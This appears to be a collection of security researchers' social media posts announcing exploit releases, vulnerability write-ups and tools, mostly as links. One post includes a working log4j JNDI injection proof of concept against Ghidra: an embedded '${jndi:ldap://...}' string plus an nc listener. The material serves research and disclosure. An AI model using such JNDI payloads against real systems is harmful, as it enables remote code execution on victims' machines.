Just published Hyper-V backdoor massive update. github.com/Cr4sh/s6_pcie_…

I have released my exploit for CVE-2020-3153 - Cisco AnyConnect privilege escalation through path traversal github.com/goichot/CVE-20… My notes on this vuln: github.com/goichot/CVE-20… Kudos to Yorick Koster for the advisory & for the -ipc help! Thank you Max for the diagrams!

My writeup is about the LNK windows bug. blog.vincss.net/2020/06/cve49-…

A survey of recent iOS kernel exploits googleprojectzero.blogspot.com/2020/06/a-surv…

hashcat 6.0.0 major update released! New Features, new Algorithms, better Performance and much more. Full release notes here: hashcat.net/forum/thread-9…

blog: Exploiting SKYSEA Activity Monitor acru3l.github.io/2020/08/03/exp…

enjoy "blackbird" 🐦 raw.githubusercontent.com/windknown/pres…

❗New whitepaper on Zerologon: CVE 2020-1472 (CVSS:10) available now on our blog: secura.com/blog/zero-logon Our test tool is published on Github here: github.com/SecuraBV/CVE-2… #CVE20201472 #zerologon #netlogon #vulnerability #whitepaper #cybersecurity #windows #CVE

Excited to finally publish my lockdown project from earlier this year: an iOS zero-click radio proximity exploit odyssey. googleprojectzero.blogspot.com/2020/12/an-ios…

Cydia just joined the legal battle against Apple: "A new lawsuit brought by one of Apple's oldest foes seeks to force the iPhone maker to allow alternatives to the App Store, the latest in a growing number of cases that aim to curb the tech giant's power." washingtonpost.com/technology/202…

Today we're publishing root cause analyses for the seven 0-day exploits we discovered in-the-wild in Oct 2020. Chrome, Windows, Safari, & iOS. Great work to Ian Beer j00ru//vx Samuel Groß clem1 Sergei and Mark! googleprojectzero.blogspot.com/p/rca.html

Documenting (part of) VDM, the Windows Defender signature format: github.com/commial/experi… Includes example of signature evasion and hourly updates diffing :)

After putting together a CVE-2021-21551 POC that leveraged _SEP_TOKEN_PRIVILEGES for exploitation I decided to go the more arduous route & hijack control flow transfer. Here's my write-up. This was a lot of fun!! tl;dr Patch and please enable VBS/HVCI! connormcgarr.github.io/cve-2020-21551…

Blog: CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) - Part 2 - including thoughts on detection by Alex Plaskett research.nccgroup.com/2021/08/17/cve…

Ghidra's vulnerable to log4j: __attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}"))) int a = 1; int main(){} $ gcc hello.c $ nc -l 1234 Load into Ghidra; it connects to 127.0.0.1:1234. Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1 drive.google.com/file/d/1TRx7La…

Thanks to itszn , now you can click a play button in the #how2heap main page and start learning various heap exploitation techniques! Want to learn heap in newer libc? No problem. Just select it in the panel on the left!

Today marks the official public release of "unblob", a firmware extraction tool we've developed internally and used in production for a while now. Let's explore what it is in this 🧵(1/12)

kfd, short for kernel file descriptor, is a project to read and write kernel memory on Apple devices: github.com/felix-pb/kfd

A Collection of Chrome Sandbox Escape POCs/Exploits for learning github.com/allpaca/chrome…

Ghidra 11.1 is OUT! Now with initial support for Swift, and enhanced Mach-O support. Huge news for anyone interested in iOS/MacOS Reverse Engineering!